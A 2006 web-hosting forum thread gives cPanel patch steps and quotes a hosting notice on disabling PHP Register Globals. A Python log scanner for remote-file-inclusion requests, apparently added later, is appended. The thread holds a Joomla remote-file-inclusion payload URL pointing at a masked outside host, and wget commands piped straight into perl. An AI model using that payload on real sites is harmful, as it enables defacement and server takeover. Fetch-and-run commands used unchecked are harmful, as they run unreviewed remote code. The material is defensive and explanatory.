• 26-09-2006, 12:20:22
    #1
    Awaiting authentication or administrator approval.
    Because of a new vulnerability found in cPanel, the entire server is at risk of being taken over.
    I noticed it this morning when I went on cPanel's forums.

    Solution: upgrade your cPanel versions to the EDGE or CURRENT builds.


    http://**.***.**.***:2086/scripts2/updateconf
    Go here and,

    cPanel/WHM Updates
    Automatic (STABLE tree)
    Automatic (RELEASE tree)
    [x]Automatic (CURRENT tree)

    with this selected,

    http://**.***.**.***:2086/scripts2/upcpform
    upgrade your cPanel installations from here

    or log in over SSH and type /scripts/upcp

    Option 2, for those who don't want to deal with cPanel Update [the cleaner way]

    Log in over SSH and type:
    wget -q -O - http://layer1.cpanel.net/installer/sec092506.pl | perl
    Once the patch has finished, test the patch:
    wget -q -O - http://layer1.cpanel.net/installer/c...cker_092406.pl cpanel_exploit_checker_092406.pl | perl
    When the patch test passes, it prints a message like the one below
    Quote
    cPanel Exploit Checker 3.0
    Checking /usr/local/cpanel/bin/mysqladmin...safe..Done
    Checking /usr/local/cpanel/bin/hooksadmin...not installed (ok) Done
    Your system has been
    patched!
    Hostgator - Exploited by Hackers (Merged) - WebHostingTalk Forums
    cPanel Forums
  • 26-09-2006, 15:24:12
    #2
    There are already a ton of attacks, let's not have to deal with this too. Thanks, Osman.
  • 26-09-2006, 15:38:17
    #3
    I'll write something separate about the attacks.
  • 26-09-2006, 17:43:29
    #4
    Membership suspended
    Reseller Zoom has set Register Globals to OFF.
    Details:

    We will be making a server configuration change related to PHP Register
    Globals at the date below. If you are NOT using PHP for your website
    you can disregard this notice. Currently PHP Register Globals is set to
    ON across our entire network of servers and will be changed to OFF. You
    will find a mini FAQ regarding this change below.

    Server: Lewis
    Change Date: Sunday October 1, 2006

    Why are we making this change?

    When Register Globals is ON, you can overwrite variables in PHP scripts
    by appending them to the URL, e.g. script.php?myvar=42 would define a
    variable myvar with the value of 42. Depending on how your script works
    this could be a security risk which was the case with many of the
    scripts within Fantastico being hacked/compromised.

    An example was Mambo/Joomla scripts being exploited by including the
    following in the requested URL:

    components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://*****.com/oki/lol.txt?

    The example above shows how easy it is to call an external script by
    using the calendar component in Joomla to deface the website. PHP has set
    Register Globals default value to OFF since version 4.2.0 as noted here
    in the first line: http://us3.php.net/register_globals.

    What can happen as a result of this change?

    Old/outdated scripts still depending on Register Globals to be ON will
    have problems as those scripts need Register Globals to be on in order
    to work.

    What can be done to prevent/resolve any problems caused as a result of
    this change?

    Most scripts have dropped the need of Register Globals to be ON or have
    custom workarounds to this issue. Upgrading to the latest version of
    the script could possibly resolve any problems caused by this change. We
    also recommend contacting your script developer if you're unsure to see
    if Register Globals turned ON is a requirement. Other solutions
    include:

    1- Contacting your script developer to make changes to the script so it
    does not rely on Register Globals to be enabled.

    2- If your scripts need Register Globals enabled for the use of
    GET/POST/COOKIE variables then you can add the following in the file header:

    import_request_variables('GPC');

    If you need other variables like SERVER use the function extract().

    3- If you need Register Globals ON then you can upload a custom php.ini
    file in your scripts directory to negate this change (this means your
    scripts will be vulnerable to being exploited). You can find a custom
    php.ini file at the URL below with Register Globals turned ON. Simply
    upload it to your scripts directory and name it php.ini to override the
    change on the server.
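
A defender-side check for the request pattern the notice describes, as an added example that is not part of the original post or the quoted notice: it scans web-server access logs for query parameters whose value is itself a remote URL. The log lines, IP addresses and the files.example.net host are constructed samples, and the Apache combined log format is an assumption.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Request line of an Apache/NCSA access-log entry: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# A parameter value that is itself a remote URL is what an include() would fetch
REMOTE_RE = re.compile(r'^\s*(?:https?|ftps?)://', re.IGNORECASE)

# Constructed sample log lines (documentation IP ranges, example host)
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Oct/2006:10:00:01 +0000] "GET /index.php?option=com_content&id=5 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [01/Oct/2006:10:00:05 +0000] "GET /components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://files.example.net/a.txt? HTTP/1.1" 200 312',
    '203.0.113.9 - - [01/Oct/2006:10:00:09 +0000] "GET /script.php?myvar=%68ttp%3A%2F%2Ffiles.example.net%2Fa.txt HTTP/1.0" 200 98',
    '198.51.100.4 - - [01/Oct/2006:10:01:00 +0000] "GET /script.php?myvar=42 HTTP/1.1" 200 40',
]

def remote_include_params(log_line):
    """Return [(path, param, value)] for query parameters whose value is a remote URL."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return []
    target = urlsplit(m.group(1))
    hits = []
    # parse_qsl percent-decodes values, so an encoded "%68ttp://" is caught as well
    for name, value in parse_qsl(target.query, keep_blank_values=True):
        if REMOTE_RE.match(value):
            hits.append((target.path, name, value))
    return hits

def scan(lines):
    """Return [(client_ip, path, param, value)] for every suspicious request."""
    findings = []
    for line in lines:
        ip = line.split(" ", 1)[0]  # first field of the log entry is the client address
        for path, name, value in remote_include_params(line):
            findings.append((ip, path, name, value))
    return findings

if __name__ == "__main__":
    for ip, path, name, value in scan(SAMPLE_LOG):
        print(f"{ip} {path} {name}={value}")
```

Legitimate parameters that carry URLs (redirect or return targets) also match, so treat hits as triage input and give priority to parameter names that correspond to a script's own configuration variables.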